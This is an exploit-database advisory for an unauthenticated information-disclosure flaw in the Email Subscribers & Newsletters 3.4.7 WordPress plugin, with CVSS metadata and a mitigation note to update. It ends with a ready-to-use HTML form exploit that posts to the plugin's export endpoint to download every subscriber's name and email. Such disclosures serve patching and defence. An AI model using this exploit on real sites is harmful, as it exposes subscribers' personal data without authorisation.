WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure

vendor:

Email Subscribers & Newsletters

by:

ThreatPress Security

7.5

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: Email Subscribers & Newsletters

Affected Version From: 3.4.7

Affected Version To: 3.4.7

Patch Exists: YES

Related CWE: N/A

CPE: a:icegram:email_subscribers_&_newsletters

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WordPress 4.9.2

2018

WordPress Plugin Email Subscribers & Newsletters 3.4.7 – Information Disclosure

Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed the vulnerability that allows an unauthenticated user to download the entire subscriber list with names and e-mail addresses.

Mitigation:

Update to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage: http://icegram.com/
# Software Link: https://wordpress.org/plugins/email-subscribers/
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :

Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed  the vulnerability that allows an unauthenticated user to download the entire subscriber  list with names and e-mail addresses.

Exploit:

<form action="http://DOMAINTOTEST.com/?es=export" method="post">
    <input type="text" name="option" value="view_all_subscribers" />
    <input type="submit" value="Exploit" />
</form>